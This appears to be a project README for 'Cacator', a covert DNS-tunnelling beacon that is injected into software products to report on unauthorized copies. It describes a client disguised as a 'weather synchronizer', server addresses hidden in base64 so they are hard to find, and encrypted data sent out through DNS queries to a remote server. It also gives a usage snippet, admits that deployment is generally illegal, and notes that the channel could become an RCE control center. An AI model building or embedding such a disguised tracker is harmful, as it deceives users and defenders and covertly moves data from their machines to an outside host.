Cacator, derived from Latin, Russian translation interprets more like "a pain in the a**".
This project serves as a beacon for detecting unauthorized copies of our software. It operates using DNS covert channels. Initially based on WEASEL, the project has undergone significant restructuring.
The main benefit of using this type of communication channel is that it hides your beacon from network scanners. Scanning for strange DNS requests is expensive and troublesome, so almost no one does it.
It is generally illegal to deploy such trackers (and INVIAN never did). However, having such a repository in your company's GitHub account can help instill fear in those unscrupulous and filthy competitors who have been stealing proprietary software and ML models from honest companies for years without getting caught.
"Just a weather synchronizer"
This client library to be injected into a product. It requires a data factory along with DNS server addresses encoded in base64. This setup helps conceal suspicious strings in case malicious actors attempt to find them. Given that the products were written in Python, hiding information was challenging.
from evwsync import WeatherSynchronizer
WeatherSynchronizer(
lambda: {"my_heart", "beating"},
servers: ["ZXhhbXBsZS5vcmc="]
)
The client initiates a Diffie-Hellman key exchange with the server and then begins sending data.
A DNS server, which pretends to respond to client requests with IP addresses (keep reading to find out why!).
Client messages are encrypted, split into packets, and encoded as domain addresses (e.g., somerandomcryptobase64==@example.org). The server receives these packets, assembles and decrypts them, and responds with packets encoded as IP addresses. There is potential to develop this into an RCE control center, but such an implementation was not needed. However, an example of this can be found in WEASEL.